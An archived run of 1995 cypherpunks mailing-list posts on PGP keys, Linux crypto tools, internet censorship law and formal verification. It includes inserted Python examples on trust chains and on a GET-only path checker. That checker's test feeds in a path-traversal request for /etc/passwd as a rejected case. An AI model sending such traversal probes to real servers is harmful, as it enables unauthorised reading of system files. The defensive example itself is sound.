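    "BRYCE":  ("bryce@example.org", None),
}

# Constructed certifications as (signer, signed key) pairs.
SIGNATURES = [
    ("ME", "ALICE"),
    ("ME", "CAROL"),
    ("CAROL", "BILL93"),    # old key vouched for by a key that later expired
    ("BILL93", "BILL95"),   # current key signed only by the owner's old key
    ("BILL95", "BILL95"),   # self-signature
    ("BRYCE", "BRYCE"),     # key signed by nobody except its owner
]


def find_chain(target, roots, signatures, keys, today, max_depth=4):
    """Return the shortest chain [root, ..., target] of key ids, or None.

    Each adjacent pair in the chain is a signature by the left key on the
    right key. Self-signatures are ignored because they say nothing about
    who holds the key, and expired or unknown signers are not followed.
    """
    signers_of = {}
    for signer, signed in signatures:
        if signer != signed:
            signers_of.setdefault(signed, []).append(signer)

    def usable(key_id):
        if key_id not in keys:
            return False
        expiry = keys[key_id][1]
        return expiry is None or expiry >= today

    if not usable(target):
        return None

    # Breadth-first search backwards from the target, so the first root
    # reached gives the chain with the fewest signatures.
    queue = deque([[target]])
    seen = {target}
    while queue:
        path = queue.popleft()
        head = path[0]
        if head in roots:
            return path
        if len(path) - 1 >= max_depth:   # chain already uses max_depth signatures
            continue
        for signer in sorted(signers_of.get(head, [])):
            if signer in seen or not usable(signer):
                continue
            seen.add(signer)
            queue.append([signer] + path)
    return None


if __name__ == "__main__":
    today = date(1995, 8, 5)
    for key_id in ("BRYCE", "BILL95"):
        print(key_id, find_chain(key_id, {"ME"}, SIGNATURES, KEYS, today))
    # One fresh signature from a key the verifier already trusts fixes it.
    fixed = SIGNATURES + [("ALICE", "BILL95")]
    print("BILL95", find_chain("BILL95", {"ME"}, fixed, KEYS, today))
```
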





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 4 Aug 95 20:44:09 PDT
To: Gerstein@scsud.ctstateu.edu (Adam J. Gerstein)
Subject: Re: Using MacPGP to revoke a key...
Message-ID: <v02130501ac483cc36156@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 8/3/95, Adam J. Gerstein wrote:
>Sorry to bother y'all with such an amateur question, but I can't find this
>in TFM, so I figured I'd ask those who are more in the know.....
>
>Anyway, I'm considering revoking my public key because it's been out there
>a while and I'm feeling the urge to change to a larger key, but I'm not
>clear on how to revoke the old one. Do I just make a text file with my new
>key in it, explain that I'm revoking the old one, sign it with my new key
>and then post it to the list? Or do I just send it to a keyserver?
>
>Again, I'm sorry to be asking y'all about something so easy. I don't want
>to start a whole new thread about this, so if you've got something helpful
>to add, please send it via private mail.

There is no need to revoke the old key - you just create a new key with
both the old and new keys and send it to the KeyServer. The normal PGP
"Default" when there is more than one key with the same Email Address is
to use the last one (which would be last in the keyring as well as have the
latest date). By leaving the old key as NOT revoked it can still be used
but will tend to be replaced by the new longer key as people get your key
from the Server.

If you DO want to revoke the old key, you just send the Revocation
Certificate to the KeyServer along with the new longer key (but note that
then, I think you will not be able to decode messages sent with the old
key).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Miszewski (IAAL - I AM a lawyer!)" <crypto@midex.com>
Date: Fri, 4 Aug 95 15:46:29 PDT
To: perry@piermont.com
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <199508042138.RAA05009@panix4.panix.com>
Message-ID: <Pine.3.89.9508042348.A14665-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 4 Aug 1995, Perry E. Metzger wrote:

> 
> You don't need to use IPv6 for the security, by the way -- it's defined
> to work on either. If you want, of course, I'm sure the v6 folks would
> love a Linux v6 stack to show up soon...

And so would dedicated Linux users from around the globe!  Linux is quite 
liberating, but security is a whole different concern.

Matt


> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Sat, 5 Aug 95 00:01:35 PDT
To: cypherpunks@toad.com
Subject: Cox/Wyden passed, but so did "Managers' Amendment"
Message-ID: <199508050701.AAA00510@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************
  **         **      **       ***               POLICY POST
  **         **      **       ***
  **         **      **       ***               August 4, 1995
  **         **      **       ***               Number 23
  ********   *********        ***
   ******    ********         ***

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 23                       August 4, 1995

CONTENTS: (1) House Approves Cox/Wyden 'Internet Freedom' Bill 420 to 4
              Major Victory for Cyberspace -- Indecency Statutes Remain
              A Serious Issue
          (2) Subscribe To The CDT Policy Post Distribution List
          (3) About CDT, Contacting US

This document may be re-distributed freely provided it remains in its
entirety.
------------------------------------------------------------------------

(1) HOUSE PASSES COX/WYDEN 'INTERNET FREEDOM' AMENDMENT
    MAJOR VICTORY FOR CYBERSPACE -- INDECENCY STATUTES REMAIN A MAJOR
    ISSUE

By an overwhelming vote of 420 to 4, the US House of Representatives
today approved the 'Internet Freedom and Family Empowerment' amendment,
sponsored by Reps. Chris Cox (R-CA) and Ron Wyden (D-OR), which would
prohibit the federal government from regulating content on the Internet,
commercial online services, and other interactive media.

Unlike the Senate-passed Exon/Coats Communications Decency Act (CDA),
the Cox/Wyden amendment ensures that individuals and parents can decide
for themselves what information they or their children receive. By
contrast, the Exon/Coats CDA would grant the Federal Communications
Commission (FCC) broad powers to regulate the expression of each and
every one of the millions of users of the Internet.

The Cox/Wyden amendment:

* Prohibits the FCC from imposing content regulations on the Internet or
  other interactive media.

* Removes disincentives for online service providers to exercise
  editorial control over their networks and to provide blocking and
  screening technologies to their users.

* Seeks to create a uniform national policy prohibiting content
  regulations in interactive media.

CDT believes that the Cox/Wyden amendment is an enlightened approach to
addressing the issue of children's access to objectionable material
online. Unlike the Senate-passed CDA, the Cox/Wyden approach recognizes
that the Internet is a global, decentralized network, with abundant
capacity for content and tremendous user control.

House passage of the Cox/Wyden amendment sets the stage for a direct
battle between the House and Senate on the issue of government content
regulation in interactive media. CDT will work vigorously to ensure that
the Cox/Wyden amendment replaces the Exon/Coats CDA in the final version
of telecommunications Reform legislation.

NEW UNCONSTITUTIONAL INDECENCY RESTRICTIONS ALSO APPROVED

Although the House vote today significantly advanced freedom of speech
on the Internet, the threat of unconstitutional indecency restrictions
remains.

In a vote unrelated to the Cox/Wyden amendment, the House also approved
changes to federal obscenity laws which would criminalize the
transmission of constitutionally protected speech online. These
amendments were approved as part of the "Managers Amendment" to the
Telecommunications reform bill (HR 1555). Although these amendments are
more narrowly drawn than the Exon/Coats CDA or the Grassley/Dole
"Protection of Children from Computer Pornography Act" (S. 892), they
clearly violate the First Amendment and remain an issue of serious
concern to CDT.

The new criminal law amendments are opposed by several prominent members
of both the House and Senate, including Cox and Wyden. As the bill makes
its way through the House/Senate conference committee, CDT will work
with Reps. Cox and Wyden, Senator Leahy, and others to:

* Remove the unconstitutional indecency restrictions added as part of
  the "Managers amendment"

* Ensure that the Cox/Wyden amendment replaces the Exon/Coats CDA in the
  final telecommunications reform bill

* Clarify that the Cox/Wyden amendment does not affect privacy
  protections under the Electronic Communications Privacy Act (ECPA)

* Strengthen provisions that pre-empt state online censorship laws.

COX/WYDEN AMENDMENT PROTECTS CYBERSPACE FROM GOVERNMENT INTRUSION,
RECOGNIZES PARENTAL CONTROL POSSIBILITIES

The Cox/Wyden bill seeks to accomplish four principal objectives:

* PROHIBIT FCC CONTENT REGULATION OF THE INTERNET AND INTERACTIVE
  COMMUNICATIONS SERVICES.

  The bill explicitly prohibits the Federal Communications Commission
  from imposing content or other regulations on the Internet or other
  interactive communications services (Sec 2 (d)).

  This provision recognizes that Interactive media is different from
  traditional mass media (such as broadcast radio and television), and
  will enshrine in statute strong protections for all content carried on
  the Internet and other interactive communications services. Instead of
  relying on government censors to determine what is or is not
  appropriate for audiences, this provision recognizes that individuals
  and parents are uniquely qualified to make those judgments.

* REMOVE DISINCENTIVES FOR ONLINE SERVICE PROVIDERS TO EXERCISE
  EDITORIAL CONTROL OVER THEIR NETWORKS AND TO DEPLOY BLOCKING AND
  SCREENING TECHNOLOGIES FOR THEIR SUBSCRIBERS.

  The bill would remove liability for providers of interactive
  communications services who take good faith steps to restrict access
  to obscene or indecent materials to minors or provide software or
  hardware to enable their users to block objectionable material.(Sec 2
  (c))  In addition, the bill would overturn the recent court  decision
  (Stratton Oakmont, Inc. v. Prodigy Services Co., N.Y. Sup. Ct. May 24,
  1995) which held Prodigy liable for content on its network
  because the service screens for sexually explicit material and
  language.  Prodigy now faces a $200 million lawsuit.

  The bill does not intend to create an obligation for providers to
  monitor or screen content or to allow violation of Federal privacy
  statutes (such as the Electronic Communications Privacy Act), although
  some concerns remain on these points. CDT remains committed to
  addressing these concerns as the legislation moves to conference, and
  has been assured by Reps. Cox and Wyden that these issues will be
  addressed.

* PRE-EMPT INCONSISTENT STATE LAWS REGULATING CONTENT ON INTERACTIVE
  COMMUNICATIONS SERVICES.

  The bill seeks to pre-empt States from enforcing inconsistent laws,
  including restrictions on content available on interactive
  communications services.  (Sec 2 (e)(2))

  The actual scope of this preemption remains an issue of some
  discussion. CDT believes that any legislation in this area MUST
  contain a strong pre-emption of inconsistent state laws. A patchwork
  of state laws which impose varying, and in some cases contradictory,
  obligations on service providers and content providers must be
  avoided. CDT will work to ensure that the Cox/Wyden bill creates a
  uniform national policy which prohibits states from imposing content
  regulations on interactive media.

* NO EFFECT ON CRIMINAL LAW.

  The bill is not intended to prevent the enforcement of the current
  dial-a-porn statute or other Federal criminal statutes such as
  obscenity, child pornography, harassment, etc. (Sec 2 (e)(1))

NET ACTIVISM A CRITICAL FACTOR

When Senator Exon (D-NE) first proposed the CDA in February 1995, the
net.community reacted with strong opposition. A coalition of online
activist organizations, including CDT, EFF, People for the American Way,
EPIC, the ACLU and organized with the Voters Telecommunications Watch
(VTW), worked tirelessly over the last six months to mobilize grass
roots opposition to the CDA. Through our efforts of generating thousands
of phone calls to Congressional offices and an online petition which
generated over 100,000 signatures in support of an alternative to the
CDA, the net.community was able to demonstrate that we are a political
force to be reckoned with.

The net.campaign and public education efforts helped to encourage House
Speaker Newt Gingrich (R-GA) to come out against the CDA, and was an
important factor in Reps. Cox and Wyden's decision to propose their
alternative. As the legislation moves to the conference committee and
then on to final passage, the net.community must be prepared to continue
to fight to ensure that the new criminal provisions are removed and that
the Cox/Wyden amendment is not weakened.

GENESIS OF THE COX/WYDEN AMENDMENT

After the Senate passed the CDA by a vote of 84-16 on June 14, CDT
stepped up our efforts to find an alternative which protected the First
Amendment and recognized the unique nature of interactive media. Both on
our own and through the Interactive Working Group (a group of over 80
public interest organizations and leading computer and communications
companies, content providers, and others, coordinated by CDT. The IWG
includes the ACLU, People for the American Way, the Progress and Freedom
Foundation, America Online, MCI, Compuserve and Prodigy, and many other
organizations and corporations), worked directly with Reps. Cox and
Wyden to bolster the case that parental control technologies offered an
effective alternative to government content regulations.

To this end, the IWG held a demonstration for members of Congress and
the press in mid-July to demonstrate parental control features of
products offered by Netscape, SurfWatch, WebTrack, America Online, and
Prodigy.

In addition, the IWG issued a comprehensive report reviewing current
technology and the state of current laws prohibiting trafficking in
obscenity, child pornography, stalking, threats, and other criminal
conduct online (this report can be viewed on CDT's web site
URL:http://www.cdt.org/iwg/IWGrept.html).

Through these efforts and the efforts of VTW's online coalition, to
educate members of the House about the problems with the Exon/CDA and
the promise of interactive media, the House today has enacted an
enlightened approach to dealing with children's access to inappropriate
material online. Today's vote represents a tremendous victory for the
first amendment and the promise of cyberspace.

NEXT STEPS

The House Telecommunications legislation (HR 1555) is expected to pass
later today (8/4). The Senate approved similar legislation (S. 652) in
June. Both bills now move to a House/Senate Conference Committee where
differences will be worked out. The Conference Committee is expected to
begin deliberation in early September. Once the Conference Committee
agrees on a version of the bill, it will be sent back to both the House
and Senate for final approval. This vote is expected to occur before the
end of October.

The Internet-censorship provisions of the Senate bill are among the key
differences between the House and Senate proposals. However, several key
members of the Senate, including Senator Patrick Leahy (D-VT) and Russ
Feingold (D-WI) have expressed opposition to the Exon/Coats approach.

CDT will fight vigorously throughout the remainder of this Congress to
ensure that the Exon/Coats CDA does not become law. We will also work to
remove the new unconstitutional criminal law amendments passed by the
House today.

------------------------------------------------------------------------
(3) How To Subscribe To The CDT Policy Post Distribution List

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

SUBSCRIPTION INFORMATION

1. SUBSCRIBING TO THE LIST

To subscribe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@cdt.org" with the following command
in the body of your email message:

    unsubscribe policy-posts youremail@local.host (your name)

(leave the subject line blank)

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization. The Center's mission is to develop and advocate public
policies that advance constitutional civil liberties and democratic
values in new computer and communications technologies.

Contacting us:

General information on CDT can be obtained by sending mail to


World-Wide-Web:

   http://www.cdt.org/

ftp:

   ftp://ftp.cdt.org/pub/cdt/

snail mail:

Center For Democracy and Technology
1001 G Street, NW Suite 700 East
Washington, DC 20001
voice: +1.202.637.9800
fax:   +1.202.637.0968




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Miszewski (IAAL - I AM a lawyer!)" <crypto@midex.com>
Date: Fri, 4 Aug 95 15:58:57 PDT
To: "Stephen D. Williams" <sdw@lig.net>
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <m0seRLR-0009yuC@sdwsys>
Message-ID: <Pine.3.89.9508050050.A14679-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 4 Aug 1995, Stephen D. Williams wrote:

> I'm interested in hacking Linux, loopback userspace drivers for other Unix's,
> and thinking about what would need to be done for MS-BLECH.  Of course,
> firewall like conversion of IP<->IPng6 would be great.

Please keep me informed of your progress.  Does anyone out there have a 
somewhat comprehensive listing of these or other implementations 
already ported to Linux?  I am intending on setting up an alternative 
site for folks with nosey or suppressive employer accounts or private 
university accounts who desire an anonymous account somewhere else.

> 
> Of course now that Linux has IP aliasing, IP masquerading (partial I think),
> ipfw, and IP over IP tunneling, it has much of what it needs.  I'm just
> considering development and migration paths.
> 

While they are getting better and better, I am not certain that anything 
is ready to be deemed as secure as it can be.


> I haven't kept up on IPng6 docs, so succinct pointers would be helpful.

In that same spirit, does anyone have pointers to Linux specific security 
implementations.  I would also be interested in ported implementations of 
remailers, or other anonymity protecting services.

> -- 
> Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
> Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
> OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
> Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ghio <ghio@utopia.hacktic.nl>
Date: Fri, 4 Aug 95 18:09:12 PDT
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <m0seRLR-0009yuC@sdwsys>
Message-ID: <199508050109.DAA03142@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Matt Miszewski IAAL - I AM a lawyer! (crypto@midex.com) wrote:

: Please keep me informed of your progress.  Does anyone out there have a 
: somewhat comprehensive listing of these or other implementations 
: already ported to Linux?  I am intending on setting up an alternative 
: site for folks with nosey or suppressive employer accounts or private 
: university accounts who desire an anonymous account somewhere else.

I have used deslogin and ctelnet with Linux

: In that same spirit, does anyone have pointers to Linux specific security 
: implementations.  I would also be interested in ported implementations of 
: remailers, or other anonymity protecting services.

All the remailers that I know of work with Linux.

Here's a list of crypto apps that I know will run under Linux:

ssh
cryptod/ctelnet
deslogin
cfs
pgp
datalock
mixmaster v2

Stuff I'm not sure about:

esm
swipe


Anything else?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 5 Aug 95 01:12:44 PDT
To: cypherpunks@toad.com
Subject: Secure FileSystem vs Secure Device
Message-ID: <199508051026.FAA16096@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


         Secure FileSystem vs Secure Device

Cypherpunks,

   I have been studying the software package SFS110 (Secure FileSystem)
version 1.10 by Peter Gutmann. I originally wanted to use
SECDEV (Secure Device) but mistook Secure File System for it. I have
heard references to Secure Device on Cypherpunks but I have heard
nothing about Secure FileSystem.

   Does anyone have knowledge of both of these systems & can give me
advice on which is superior? Also, I found Secure Device compressed
with a .arj compression system. What is this compression method? Is
there a DOS version of Secure Device?

   I have done some preliminary reading of Secure FileSystem & I find
it to be very impressive! So, why no mention on Cypherpunks? Is Secure
Device that much superior or has Secure FileSystem just been over-
looked? Also, what are the latest version numbers of both of them?

                                 PUSH EM BACK! PUSH EM BACK!
                                 WWWAAAYYYY   BBBAAACCCCK!
                                 BBBEEEAAATTTT  STATE!
                                 Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sat, 5 Aug 95 00:51:58 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199508040517.BAA05467@clark.net>
Message-ID: <9508050751.AA22209@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


|>   Finally, all you have to do to remove all I/O ability from Java is delete
|> the File I/O classes from the class hierarchy on your disk where HotJava
|> runs. Most apps don't use any File I/O anyway.

For Java to reach its full potential, I think it is absolutely essential
that applets have the ability to securely and reliably store information
for long periods of time. In the long term, this means creating remote
applet accessible datahavens. But as a temporary hack, before clean code
supporting such services becomes available, very limited local file access
is clearly the way to go. This is an important _feature_ that will enable
some truly complex services as the class libraries mature, not a bug.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sat, 5 Aug 95 01:06:54 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: RSA has been proved correct
In-Reply-To: <ac470d240502100447cc@[205.199.118.202]>
Message-ID: <9508050806.AA22214@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Tim quoth:

|> I was reading the logic programming/theorem proving chapter of my new
|> Russell and Norvig book on AI, and came across something I once knew about
|> but had forgotten: the Boyer-Moore theorem prover was applied to the RSA
|> algorithm and the correctness of it was verified. Correctness in the sense
|> of showing that outputs match formal specs, for all inputs.

|> The paper is: Boyer, R.S and Moore, J.S. (1984). Proof checking the RSA
|> public key encryption algorithm, "American Mathematical Monthly,"
|> 91(3):181-189.

Given the enormous difficulty of ensuring security in a world of
ubiquitous distributed computing, I'm as big a fan as any of formal
methods. But Tim's post hammers home the big fault of formal methods:
the possibility that people will come to rely upon them. I have
paranoid visions of people finally accepting formal methods in a decade
or so, and then becoming dependent on them... forgetting the enormous
potential for error that will always exist in such systems.

If somebody told me that intentionally letting a few violent criminals
free each year is a good idea because it would keep me on my toes, I
would think that person is an idiot. But I'm not entirely convinced that
it is a bad idea to avoid formal methods because they could breed
complacency.

Cheers,

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 5 Aug 95 05:12:19 PDT
To: cypherpunks@toad.com
Subject: JIL_ted
Message-ID: <199508051212.IAA26627@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-5-95. NYPaper:


   "Esoteric Wedge of Academia Is Roiled by Hunt for Bomber."

      Last October an agent from the Federal Bureau of
      Investigation showed up in New Orleans and subpoenaed
      the History of Science Society's membership records and
      questioned scholars for clues to the identity of the
      Unabomber. That subpoena, and the disclosure that the
      F.B.I. believes that the bomber is immersed in the most
      radical interpretations of the history of science, has
      roiled the usually placid waters of the discipline. And
      across the country, professors have begun reconsidering
      old suspicions, acquaintances and tracts to help solve
      the crimes.                                    ROL_aid


   "Obscure Global Bank Moves Into the Light."

      In a small Swiss city sits an international organization
      so obscure and secretive that for many years visitors
      got lost looking for a small plaque next to an otherwise
      undistinguished doorway. Control of the institution, the
      Bank for International Settlements, lies with some of
      the world's most powerful and least visible men: the
      heads of 32 central banks, officials able to shift
      billions of dollars and alter the course of economies at
      the stroke of a pen. Now, however, the bank is stepping
      out of the shadows a bit. Last September, the Federal
      Reserve, the United States' central bank, officially
      joined -- quietly and discreetly, of course.   DON_ask


   Buda-Pest: JIL_ted








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 5 Aug 95 05:24:27 PDT
To: nzook@bga.com (Nathan Zook)
Subject: There's a hole in your reasonoing
In-Reply-To: <Pine.3.89.9508042253.A3820-0100000@jake.bga.com>
Message-ID: <9508051223.AA22788@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> 
> On Thu, 3 Aug 1995, Nathan Loofbourrow wrote:
> 
> > Nathan Zook writes:
> >  > > And is there any way to build trusted system out of small, verifiable
> >  > > pieces?  Since the way they're connected could also be questioned, I
> >  > > suspect that when you put enough of them together it's just as bad as
> >  > > the case of a single, monolithic program.  But this isn't my area, so
> >  > > I don't know.
> >  > 
> >  > No.  This was essentially proved during the first third of this century.
...
> There is "active research".  Why is a mystery to me.  Godel's proof was 
> the completion of several works.  One of the early ones demonstrated that no 
> axiom system can be demonstrated to be consistent by a weaker one.  Now the 
> "research" in this area has consisted, in part, of translating 
> algorithms into statements in axiomatic systems.  The problem is that 
> either we cannot prove that these systems are consistent or they are 
> extremely limited in what they can do.  (In particular, recursion seems 
> to be anathema.)  But the word proof in the previous sentence has to be 
> taken with a grain of salt, because any axiom system that we use to prove 
> things about another axiom system has to be at least as complicated.

You hit the nail right on the head when you said:
	"or they are extremely limited in what they can do"

That's exactly the point.  We cannot prove programs with general purpose
functionality to be secure, because they are not.  But we may well be
able to prove a lot of security properties about programs that are not
general purpose.  For example, a Web server that only does GET and a
gopher server (not gopher plus) and a mail server may all fit the bill. 
And by coincidence, these are exactly the sorts of programs we want to be
able to prove security properties about.

> This is why the "not a Turing machine" assertion that the "Professor" is 
> important.  We know that Turing machine is undecidable, so if we want to 
> limit behavior, we can't have one.  BUT---we don't know that being a 
> Turing machine is equivalent to having "unpredictable" behavior.  
> Furthermore, a "proof" of the "not a Turing machine" assertion is going 
> to have to be done by--you guessed it--a computer.  And this computer is 
> running a program which definitely IS a Turing machine, if it is capable 
> of "proving" that other (suitably non-trivial) programs are not Turing 
> machines.

I think in the case of simple (i.e.  short and written for the purpose)
programs these proofs could reasonably be done by hand.  In fact, I
think we could create a theorem verifier that we could prove to only
verify true theorems as true.  Some theorems would never be proven one
way or the other, and others might be proven false, but some things,
particularly the ones we need to bootstrap the theorem proof technology
and things like the properties of a secure W3 server, could fit into this
schema.

> Why must this be done on a computer?  Because the program under 
> consideration is thousands of machine instructions long.  And each 
> instruction will be translated into dozens of statements in the axiom 
> system.  So any attempted proof will be beyond human ability.

Not in the case of programs like the secure W3 and Gopher servers.  They
are under 100 lines long.  They are also designed to allow easy proof of
the desired properties. 

...
> So in each case, complex (in the technical sense) behavior is exhibited 
> by outlandishly simple systems.  Somehow the _interactions_ of these simple 
> and predictable systems become unpredictable.

But this is only true for certain classes of systems.  By designing other
classes of systems explicitly designed to not have those properties, we can
build up substantial systems with demonstrable protection properties.

> That is why I consider this to be a closed subject.

I think you should reopen your thinking.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
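
The design argument in the message above, as an added example (not part of the original post and not code from the servers it mentions): a GET-only path check written as a small finite automaton, so that the property "no accepted path contains a '..' segment" can be decided for every input of every length by searching the product with a monitor automaton. The state names, character classes and the deliberately weakened WEAK table are assumptions made for this illustration.

```python
from collections import deque

CLASSES = ("slash", "dot", "name", "other")

def char_class(ch):
    """Map one character to the only thing the automaton is allowed to see."""
    if ch == "/":
        return "slash"
    if ch == ".":
        return "dot"
    if ch.isascii() and (ch.isalnum() or ch in "_-"):
        return "name"
    return "other"

# Strict path automaton (hypothetical policy). Any (state, class) pair that
# is not listed goes to the absorbing "reject" state.
STRICT = {
    ("start", "slash"): "seg",   # path must begin with "/"
    ("seg", "name"): "name",     # a segment must begin with a name character
    ("name", "name"): "name",
    ("name", "dot"): "dot",      # a single dot is allowed inside a segment
    ("name", "slash"): "seg",
    ("dot", "name"): "name",     # a dot must be followed by a name character
}
ACCEPT = {"seg", "name"}

# Constructed weak variant: dots may start a segment and may repeat.
WEAK = dict(STRICT)
WEAK.update({("seg", "dot"): "dot", ("dot", "dot"): "dot", ("dot", "slash"): "seg"})

MAX_LINE = 255  # assumed bound on request length

def step(table, state, cls):
    return table.get((state, cls), "reject")

def accepts(table, path):
    """Run the automaton over the path; one table lookup per character."""
    state = "start"
    for ch in path:
        state = step(table, state, char_class(ch))
    return state in ACCEPT

def check_request(table, line):
    """Return the path of an acceptable 'GET <path>' line, else None."""
    if len(line) > MAX_LINE or not line.startswith("GET "):
        return None
    path = line[4:]
    return path if accepts(table, path) else None

# Independent monitor: it knows nothing about the policy above and only
# tracks whether some segment of the input is exactly "..".
MONITOR = {
    ("m_start", "dot"): "m_d1", ("m_start", "slash"): "m_start",
    ("m_d1", "dot"): "m_d2", ("m_d1", "slash"): "m_start",
    ("m_d2", "slash"): "m_bad",
    ("m_in", "slash"): "m_start",
}
UNSAFE = {"m_d2", "m_bad"}  # ".." is the last segment, or was an earlier one

def monitor_step(state, cls):
    if state == "m_bad":
        return "m_bad"
    return MONITOR.get((state, cls), "m_in")

def find_counterexample(table):
    """Breadth-first search of the product automaton.

    Returns the shortest sequence of character classes that the table accepts
    although the monitor flags it, or None if no such input exists at all.
    The product has finitely many states, so the search always terminates.
    """
    start = ("start", "m_start")
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        dfa, mon = node
        if dfa in ACCEPT and mon in UNSAFE:
            trace = []
            while parent[node] is not None:
                node, cls = parent[node]
                trace.append(cls)
            return trace[::-1]
        for cls in CLASSES:
            nxt = (step(table, dfa, cls), monitor_step(mon, cls))
            if nxt not in parent:
                parent[nxt] = (node, cls)
                queue.append(nxt)
    return None

if __name__ == "__main__":
    print("strict:", find_counterexample(STRICT))
    print("weak:  ", find_counterexample(WEAK))
    print(check_request(STRICT, "GET /index.html"))
    print(check_request(STRICT, "GET /../etc/passwd"))
```

The search over STRICT covers every string of every length, which is what a test suite of sample requests cannot do; the same search over WEAK returns the shortest input that breaks the property.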



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 5 Aug 95 07:06:23 PDT
To: cypherpunks@toad.com
Subject: JAC_kio
Message-ID: <199508051406.KAA29361@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-6-95. NYPaper Book Review:


   "Spies Unlike Us: A history of French intelligence reveals
   a far more brutal approach than this country's."

      The aftermath of 1945 imposed an additional heavy burden
      on the French secret services. Political allegiances
      were exacerbated by the presence of a potential huge
      Communist fifth column in France. The rough lessons of
      the war led to a premium on "service action" operations
      of sabotage and assassination before which Britain's
      M.I.6 would have quailed. Mr. Porch sees the French
      secret services of today as still not having recovered
      from their politicization during World War II. During
      the gulf war, the humiliating realization was forced on
      the French Army that for intelligence it was totally
      dependent on American high technology.         SAL_mai


   "The Code War: How United States intelligence outsmarted
   Japan in World War II."

      He rightly sees the role of intelligence in the Pacific
      war not simply as a story of code-breaking successes.
      Rather, he writes, "the true achievements of
      intelligence in the Pacific war lie in the day-to-day
      accumulation of a fund of knowledge.... Cryptography,
      traffic analysis, aerial photography, prisoner
      interrogation, document capture and translation, and
      technical intelligence ... became pillars of an overall
      effort greater than the sum of its parts." He explains
      and describes this winning synergy of intelligence
      elements as well as, or better than, any previous
      author.                                        PIL_sal


   Jak/Ari: JAC_kio











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marius" <Marius@doulosgeri.com>
Date: Sat, 5 Aug 95 07:59:18 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: building libraries
Message-ID: <199508051458.KAA00169@UnixServer>
MIME-Version: 1.0
Content-Type: text/plain



> Perhaps we could convince Bill Gates to bundle RSAREF with all his 
> Windoze OS's?  Ditto for Apple?
>

If Bill Gates handed out cryptography in Winoze he wouldn't be able 
to read the mail of all the lamerz who are going to be on the 
Microsoft network.  The poor rich bastard needs something to do in 
his free time other than fish in the pond that he had built under his 
house... 

Marius@doulosgeri.com

No opinions expressed by the author are shared by Doulos Productions,
The Third Wave, or any affiliated parties.  The author doesn't see why
not...  PGP public key follows...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sat, 5 Aug 95 08:18:58 PDT
To: cypherpunks@toad.com
Subject: Re: Using MacPGP to revoke a key...
Message-ID: <889c0c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Robert A. Rosenberg" <hal9001@panix.com> writes:

> There is no need to revoke the old key - you just create a new key with
> both the old and new keys and send it to the KeyServer. The normal PGP
